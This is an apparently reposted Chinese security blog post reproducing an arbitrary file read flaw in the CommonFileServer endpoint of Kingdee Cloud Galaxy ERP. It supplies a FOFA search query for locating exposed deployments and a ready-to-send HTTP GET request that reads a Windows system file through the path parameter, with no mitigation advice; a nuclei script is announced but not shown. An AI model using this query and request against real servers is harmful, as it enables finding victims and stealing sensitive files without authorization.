首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >【漏洞复现】金蝶云星空CommonFileServer存在任意文件读取漏洞

【漏洞复现】金蝶云星空CommonFileServer存在任意文件读取漏洞

作者头像
熔城Sec
发布2026-07-22 20:14:29
发布2026-07-22 20:14:29
60
举报

漏洞描述

金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空聚焦多组织,多利润中心的大中型企业。其CommonFileServer接口存在任意文件读取漏洞,由于对文件路径参数未进行严格的校验,攻击者可通过构造特殊路径读取服务器上的任意文件,导致敏感信息泄露。

资产收集

代码语言:javascript
复制
Fofa语句
app="金蝶云星空-管理中心"
图片
图片

漏洞复现

发送请求

代码语言:javascript
复制
GET /CommonFileServer/c:/windows/win.ini HTTP/1.1
Host: 
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

返回包

图片
图片

nuclei脚本

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-12-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 熔城Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档